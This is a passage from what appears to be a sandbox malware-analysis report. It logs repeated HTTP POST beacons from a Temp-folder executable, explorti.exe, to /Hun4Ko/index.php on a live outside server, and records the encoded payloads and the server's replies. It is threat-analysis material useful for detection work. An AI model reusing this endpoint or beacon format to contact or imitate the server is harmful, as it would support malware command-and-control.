                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.44974777.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:05.897336960 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:06.622106075 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:06.622920036 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:06.845200062 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.44974877.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:06.956135988 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:07.665767908 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:07.666536093 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:07.886657953 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.44974977.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:08.010957003 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:08.701706886 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:08.702505112 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:08.927601099 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.44975077.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:09.034369946 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:09.733145952 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:09.736301899 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:09.952419043 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.44975177.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:10.065789938 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:10.777014971 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:10.793365955 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:11.017653942 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.44975277.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:11.132740021 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:11.847768068 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:11.848656893 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:12.075551987 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.44975377.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:12.190593004 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:12.903009892 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:12.903976917 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:13.126121044 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.44975477.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:13.247471094 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:13.965364933 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:13.966722965 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:14.193650007 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.44975577.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:14.315563917 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:15.007656097 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:15.008673906 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:15.228898048 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.44975677.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:15.347579002 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:16.068268061 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:16.069252968 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:16.294476032 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.44975777.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:16.410980940 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:17.151032925 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:17.152453899 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:17.381314039 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.44975877.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:17.503124952 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:18.202924013 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:18.203722000 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
